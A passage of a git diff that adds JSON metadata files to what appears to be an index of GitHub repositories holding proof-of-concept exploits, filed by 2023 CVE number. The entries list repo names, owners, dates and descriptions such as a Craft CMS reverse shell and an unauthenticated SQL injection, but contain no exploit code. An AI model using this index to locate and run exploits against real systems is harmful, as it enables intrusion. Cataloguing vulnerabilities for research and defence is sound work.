31896165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31896165?v=4", + "html_url": "https:\/\/github.com\/JBalanza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JBalanza\/CVE-2023-41474", + "description": "Public disclosure of Ivanti's Avalanche Path Traversal vulnerability", + "fork": false, + "created_at": "2024-01-08T08:21:39Z", + "updated_at": "2024-08-12T20:33:09Z", + "pushed_at": "2024-01-08T08:46:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41507.json b/2023/CVE-2023-41507.json new file mode 100644 index 0000000000..335abd3b95 --- /dev/null +++ b/2023/CVE-2023-41507.json @@ -0,0 +1,33 @@ +[ + { + "id": 687283979, + "name": "CVE-2023-41507", + "full_name": "redblueteam\/CVE-2023-41507", + "owner": { + "login": "redblueteam", + "id": 29709246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29709246?v=4", + "html_url": "https:\/\/github.com\/redblueteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redblueteam\/CVE-2023-41507", + "description": "CVE-2023-41507 A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel.", + "fork": false, + "created_at": "2023-09-05T03:26:15Z", + "updated_at": "2023-09-05T03:26:16Z", + "pushed_at": "2023-09-07T23:38:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41508.json b/2023/CVE-2023-41508.json new file mode 100644 index 0000000000..07c4e168fc --- /dev/null +++ b/2023/CVE-2023-41508.json @@ -0,0 +1,33 @@ +[ + { + "id": 687284713, + "name": "CVE-2023-41508", + "full_name": "redblueteam\/CVE-2023-41508", + "owner": { + "login": "redblueteam", + "id": 29709246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29709246?v=4", + "html_url": "https:\/\/github.com\/redblueteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redblueteam\/CVE-2023-41508", + "description": "CVE-2023-41508 - A hard-coded password in Super Store Finder v3.6 allows attackers to access the administration panel.", + "fork": false, + "created_at": "2023-09-05T03:29:37Z", + "updated_at": "2023-11-02T03:37:03Z", + "pushed_at": "2023-09-07T23:41:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41533.json b/2023/CVE-2023-41533.json new file mode 100644 index 0000000000..d46a6fa208 --- /dev/null +++ b/2023/CVE-2023-41533.json @@ -0,0 +1,33 @@ +[ + { + "id": 688436461, + "name": "CVE-2023-41533", + "full_name": "Sh33talUmath\/CVE-2023-41533", + "owner": { + "login": "Sh33talUmath", + "id": 144338561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144338561?v=4", + "html_url": "https:\/\/github.com\/Sh33talUmath", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sh33talUmath\/CVE-2023-41533", + "description": null, + "fork": false, + "created_at": "2023-09-07T10:50:03Z", + "updated_at": "2023-09-07T10:50:03Z", + "pushed_at": "2023-09-07T10:57:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41534.json b/2023/CVE-2023-41534.json new file mode 100644 index 0000000000..535fe31986 --- /dev/null +++ b/2023/CVE-2023-41534.json @@ -0,0 +1,33 @@ +[ + { + "id": 688439636, + "name": "CVE-2023-41534", + "full_name": "Sh33talUmath\/CVE-2023-41534", + "owner": { + "login": "Sh33talUmath", + "id": 144338561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144338561?v=4", + "html_url": "https:\/\/github.com\/Sh33talUmath", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sh33talUmath\/CVE-2023-41534", + "description": null, + "fork": false, + "created_at": "2023-09-07T10:58:32Z", + "updated_at": "2023-09-07T10:58:32Z", + "pushed_at": "2023-09-07T10:59:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41535.json b/2023/CVE-2023-41535.json new file mode 100644 index 0000000000..5ebec7ad30 --- /dev/null +++ b/2023/CVE-2023-41535.json @@ -0,0 +1,33 @@ +[ + { + "id": 688440471, + "name": "CVE-2023-41535", + "full_name": "Sh33talUmath\/CVE-2023-41535", + "owner": { + "login": "Sh33talUmath", + "id": 144338561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144338561?v=4", + "html_url": "https:\/\/github.com\/Sh33talUmath", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sh33talUmath\/CVE-2023-41535", + "description": null, + "fork": false, + "created_at": "2023-09-07T11:01:04Z", + "updated_at": "2023-09-07T11:01:05Z", + "pushed_at": "2023-09-07T11:01:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41564.json b/2023/CVE-2023-41564.json new file mode 100644 index 0000000000..2031208740 --- /dev/null +++ b/2023/CVE-2023-41564.json @@ -0,0 +1,33 @@ +[ + { + "id": 867687521, + "name": "cve-2023-41564-research", + "full_name": "sota70\/cve-2023-41564-research", + "owner": { + "login": "sota70", + "id": 46929379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46929379?v=4", + "html_url": "https:\/\/github.com\/sota70", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sota70\/cve-2023-41564-research", + "description": null, + "fork": false, + "created_at": "2024-10-04T14:26:21Z", + "updated_at": "2024-10-04T14:31:33Z", + "pushed_at": "2024-10-04T14:31:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41575.json b/2023/CVE-2023-41575.json new file mode 100644 index 0000000000..c6c7d1373a --- /dev/null +++ b/2023/CVE-2023-41575.json @@ -0,0 +1,33 @@ +[ + { + "id": 683348712, + "name": "Stored-xss", + "full_name": "soundarkutty\/Stored-xss", + "owner": { + "login": "soundarkutty", + "id": 26168410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26168410?v=4", + "html_url": "https:\/\/github.com\/soundarkutty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soundarkutty\/Stored-xss", + "description": "Got My CVE Published CVE-2023-41575", + "fork": false, + "created_at": "2023-08-26T09:26:35Z", + "updated_at": "2023-09-23T06:43:31Z", + "pushed_at": "2023-09-23T06:43:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41592.json b/2023/CVE-2023-41592.json new file mode 100644 index 0000000000..081661ed0e --- /dev/null +++ b/2023/CVE-2023-41592.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209842, + "name": "CVE-2023-41592-2", + "full_name": "miguelc49\/CVE-2023-41592-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-41592-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:32Z", + "updated_at": "2024-04-14T17:40:42Z", + "pushed_at": "2024-04-14T17:40:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209864, + "name": "CVE-2023-41592-1", + "full_name": "miguelc49\/CVE-2023-41592-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-41592-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:36Z", + "updated_at": "2024-04-14T17:40:35Z", + "pushed_at": "2024-04-14T17:40:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209884, + "name": "CVE-2023-41592-3", + "full_name": "miguelc49\/CVE-2023-41592-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-41592-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:40Z", + "updated_at": "2024-04-22T17:46:16Z", + "pushed_at": "2024-04-22T17:46:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41593.json b/2023/CVE-2023-41593.json new file mode 100644 index 0000000000..f12eae80ff --- /dev/null +++ b/2023/CVE-2023-41593.json @@ -0,0 +1,33 @@ +[ + { + "id": 688347969, + "name": "CVE", + "full_name": "MATRIXDEVIL\/CVE", + "owner": { + "login": "MATRIXDEVIL", + "id": 92071491, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92071491?v=4", + "html_url": "https:\/\/github.com\/MATRIXDEVIL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MATRIXDEVIL\/CVE", + "description": "CVE-2023-41593", + "fork": false, + "created_at": "2023-09-07T06:59:09Z", + "updated_at": "2023-09-07T06:59:10Z", + "pushed_at": "2023-09-07T07:11:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41613.json b/2023/CVE-2023-41613.json new file mode 100644 index 0000000000..a3ad35c387 --- /dev/null +++ b/2023/CVE-2023-41613.json @@ -0,0 +1,33 @@ +[ + { + "id": 684143893, + "name": "cve-2023-41613", + "full_name": "Eafz\/cve-2023-41613", + "owner": { + "login": "Eafz", + "id": 55439965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55439965?v=4", + "html_url": "https:\/\/github.com\/Eafz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eafz\/cve-2023-41613", + "description": null, + "fork": false, + "created_at": "2023-08-28T14:45:23Z", + "updated_at": "2023-12-08T00:33:13Z", + "pushed_at": "2023-12-05T06:44:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41623.json b/2023/CVE-2023-41623.json new file mode 100644 index 0000000000..01379fae66 --- /dev/null +++ b/2023/CVE-2023-41623.json @@ -0,0 +1,33 @@ +[ + { + "id": 728954859, + "name": "wuhaozhe-s-CVE", + "full_name": "GhostBalladw\/wuhaozhe-s-CVE", + "owner": { + "login": "GhostBalladw", + "id": 136776282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136776282?v=4", + "html_url": "https:\/\/github.com\/GhostBalladw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GhostBalladw\/wuhaozhe-s-CVE", + "description": "CVE-2023-41623", + "fork": false, + "created_at": "2023-12-08T04:15:06Z", + "updated_at": "2023-12-08T04:15:06Z", + "pushed_at": "2023-12-15T07:53:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41646.json b/2023/CVE-2023-41646.json new file mode 100644 index 0000000000..42f7ce39cc --- /dev/null +++ b/2023/CVE-2023-41646.json @@ -0,0 +1,33 @@ +[ + { + "id": 686063462, + "name": "CVE-2023-41646", + "full_name": "tristao-marinho\/CVE-2023-41646", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-41646", + "description": null, + "fork": false, + "created_at": "2023-09-01T16:46:07Z", + "updated_at": "2023-09-01T16:46:07Z", + "pushed_at": "2023-09-01T16:51:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4165.json b/2023/CVE-2023-4165.json new file mode 100644 index 0000000000..46a71ceb14 --- /dev/null +++ b/2023/CVE-2023-4165.json @@ -0,0 +1,33 @@ +[ + { + "id": 685807414, + "name": "CVE-2023-4165", + "full_name": "mvpyyds\/CVE-2023-4165", + "owner": { + "login": "mvpyyds", + "id": 87457452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87457452?v=4", + "html_url": "https:\/\/github.com\/mvpyyds", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mvpyyds\/CVE-2023-4165", + "description": null, + "fork": false, + "created_at": "2023-09-01T03:55:23Z", + "updated_at": "2023-09-01T03:56:08Z", + "pushed_at": "2023-09-01T05:31:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41652.json b/2023/CVE-2023-41652.json new file mode 100644 index 0000000000..88a95b11a6 --- /dev/null +++ b/2023/CVE-2023-41652.json @@ -0,0 +1,33 @@ +[ + { + "id": 884788732, + "name": "CVE-2023-41652", + "full_name": "RandomRobbieBF\/CVE-2023-41652", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-41652", + "description": "RSVPMarker <= 10.6.6 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-11-07T11:49:36Z", + "updated_at": "2024-11-07T11:51:54Z", + "pushed_at": "2024-11-07T11:51:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4166.json b/2023/CVE-2023-4166.json new file mode 100644 index 0000000000..6a44f16c28 --- /dev/null +++ b/2023/CVE-2023-4166.json @@ -0,0 +1,33 @@ +[ + { + "id": 685829767, + "name": "CVE-2023-4166", + "full_name": "mvpyyds\/CVE-2023-4166", + "owner": { + "login": "mvpyyds", + "id": 87457452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87457452?v=4", + "html_url": "https:\/\/github.com\/mvpyyds", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mvpyyds\/CVE-2023-4166", + "description": null, + "fork": false, + "created_at": "2023-09-01T05:33:38Z", + "updated_at": "2023-10-12T07:15:33Z", + "pushed_at": "2023-09-01T05:36:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4169.json b/2023/CVE-2023-4169.json new file mode 100644 index 0000000000..63fd3b1d8d --- /dev/null +++ b/2023/CVE-2023-4169.json @@ -0,0 +1,33 @@ +[ + { + "id": 705480946, + "name": "CVE-2023-4169_CVE-2023-3306_CVE-2023-4415", + "full_name": "thedarknessdied\/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415", + "owner": { + "login": "thedarknessdied", + "id": 56123966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56123966?v=4", + "html_url": "https:\/\/github.com\/thedarknessdied", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thedarknessdied\/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415", + "description": "Ruijie-RG-EW1200G CVE-2023-4169_CVE-2023-3306_CVE-2023-4415", + "fork": false, + "created_at": "2023-10-16T05:08:06Z", + "updated_at": "2024-07-06T01:05:43Z", + "pushed_at": "2023-10-18T12:27:17Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41717.json b/2023/CVE-2023-41717.json new file mode 100644 index 0000000000..6e9614b917 --- /dev/null +++ b/2023/CVE-2023-41717.json @@ -0,0 +1,33 @@ +[ + { + "id": 685433459, + "name": "CVE-2023-41717", + "full_name": "federella\/CVE-2023-41717", + "owner": { + "login": "federella", + "id": 38486839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38486839?v=4", + "html_url": "https:\/\/github.com\/federella", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/federella\/CVE-2023-41717", + "description": "This repository is to provide a write-up and PoC for CVE-2023-41717.", + "fork": false, + "created_at": "2023-08-31T08:10:22Z", + "updated_at": "2024-08-12T20:32:39Z", + "pushed_at": "2023-08-31T09:51:35Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4174.json b/2023/CVE-2023-4174.json new file mode 100644 index 0000000000..3a90e9d2c3 --- /dev/null +++ b/2023/CVE-2023-4174.json @@ -0,0 +1,33 @@ +[ + { + "id": 677308989, + "name": "CVE-2023-4174", + "full_name": "d0rb\/CVE-2023-4174", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-4174", + "description": "CVE-2023-4174 PoC", + "fork": false, + "created_at": "2023-08-11T08:48:02Z", + "updated_at": "2023-08-11T08:48:49Z", + "pushed_at": "2023-08-11T08:48:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41772.json b/2023/CVE-2023-41772.json new file mode 100644 index 0000000000..ec6bf4c020 --- /dev/null +++ b/2023/CVE-2023-41772.json @@ -0,0 +1,33 @@ +[ + { + "id": 733456895, + "name": "CVE-2023-41772", + "full_name": "R41N3RZUF477\/CVE-2023-41772", + "owner": { + "login": "R41N3RZUF477", + "id": 63357997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63357997?v=4", + "html_url": "https:\/\/github.com\/R41N3RZUF477", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R41N3RZUF477\/CVE-2023-41772", + "description": null, + "fork": false, + "created_at": "2023-12-19T11:21:12Z", + "updated_at": "2024-05-16T06:46:13Z", + "pushed_at": "2023-12-24T10:47:00Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41892.json b/2023/CVE-2023-41892.json new file mode 100644 index 0000000000..cd5d15de40 --- /dev/null +++ b/2023/CVE-2023-41892.json @@ -0,0 +1,161 @@ +[ + { + "id": 701130009, + "name": "CVE-2023-41892", + "full_name": "zaenhaxor\/CVE-2023-41892", + "owner": { + "login": "zaenhaxor", + "id": 83585135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83585135?v=4", + "html_url": "https:\/\/github.com\/zaenhaxor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zaenhaxor\/CVE-2023-41892", + "description": "CVE-2023-41892 - Craft CMS Remote Code Execution (RCE)", + "fork": false, + "created_at": "2023-10-06T01:40:34Z", + "updated_at": "2024-09-27T09:59:05Z", + "pushed_at": "2023-10-07T03:26:00Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736015392, + "name": "CraftCMS_CVE-2023-41892", + "full_name": "0xfalafel\/CraftCMS_CVE-2023-41892", + "owner": { + "login": "0xfalafel", + "id": 4268373, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4268373?v=4", + "html_url": "https:\/\/github.com\/0xfalafel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xfalafel\/CraftCMS_CVE-2023-41892", + "description": "Exploit for CVE-2023-41892", + "fork": false, + "created_at": "2023-12-26T18:31:27Z", + "updated_at": "2024-09-21T19:17:31Z", + "pushed_at": "2023-12-26T22:39:21Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749723508, + "name": "Craft-CMS-Exploit", + "full_name": "diegaccio\/Craft-CMS-Exploit", + "owner": { + "login": "diegaccio", + "id": 152712974, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152712974?v=4", + "html_url": "https:\/\/github.com\/diegaccio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diegaccio\/Craft-CMS-Exploit", + "description": "CVE-2023-41892 Reverse Shell", + "fork": false, + "created_at": "2024-01-29T09:12:59Z", + "updated_at": "2024-09-17T01:41:03Z", + "pushed_at": "2024-02-01T21:38:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "craftcms", + "cve-2023-41892", + "reverse-shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 763685345, + "name": "CVE-2023-41892", + "full_name": "acesoyeo\/CVE-2023-41892", + "owner": { + "login": "acesoyeo", + "id": 127269737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127269737?v=4", + "html_url": "https:\/\/github.com\/acesoyeo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acesoyeo\/CVE-2023-41892", + "description": "A Craft CMS vulnerability that allows Remote Code Execution (RCE).", + "fork": false, + "created_at": "2024-02-26T18:31:46Z", + "updated_at": "2024-02-26T18:34:15Z", + "pushed_at": "2024-02-26T19:14:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834427246, + "name": "HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892", + "full_name": "CERTologists\/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892", + "description": null, + "fork": false, + "created_at": "2024-07-27T08:31:18Z", + "updated_at": "2024-07-27T08:39:33Z", + "pushed_at": "2024-07-27T08:39:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4197.json b/2023/CVE-2023-4197.json new file mode 100644 index 0000000000..c3e4ac25f5 --- /dev/null +++ b/2023/CVE-2023-4197.json @@ -0,0 +1,33 @@ +[ + { + "id": 805950324, + "name": "CVE-2023-4197", + "full_name": "alien-keric\/CVE-2023-4197", + "owner": { + "login": "alien-keric", + "id": 102582785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102582785?v=4", + "html_url": "https:\/\/github.com\/alien-keric", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alien-keric\/CVE-2023-4197", + "description": "this is a simple script from CVE-2023-4197 that was little bit modified since because it didn't work at first time with broadlight machine from HTB which means that we have to modify the script a little bit and then use it as how the ducumentation says", + "fork": false, + "created_at": "2024-05-25T23:45:30Z", + "updated_at": "2024-05-25T23:51:46Z", + "pushed_at": "2024-05-25T23:51:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41991.json b/2023/CVE-2023-41991.json new file mode 100644 index 0000000000..5829ff5793 --- /dev/null +++ b/2023/CVE-2023-41991.json @@ -0,0 +1,33 @@ +[ + { + "id": 724861098, + "name": "CVE-2023-41991", + "full_name": "Zenyith\/CVE-2023-41991", + "owner": { + "login": "Zenyith", + "id": 119261527, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119261527?v=4", + "html_url": "https:\/\/github.com\/Zenyith", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zenyith\/CVE-2023-41991", + "description": null, + "fork": false, + "created_at": "2023-11-28T23:59:40Z", + "updated_at": "2024-08-27T23:33:22Z", + "pushed_at": "2023-11-28T00:53:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41993.json b/2023/CVE-2023-41993.json new file mode 100644 index 0000000000..b7ea6b1263 --- /dev/null +++ b/2023/CVE-2023-41993.json @@ -0,0 +1,167 @@ +[ + { + "id": 705224501, + "name": "POC-for-CVE-2023-41993", + "full_name": "po6ix\/POC-for-CVE-2023-41993", + "owner": { + 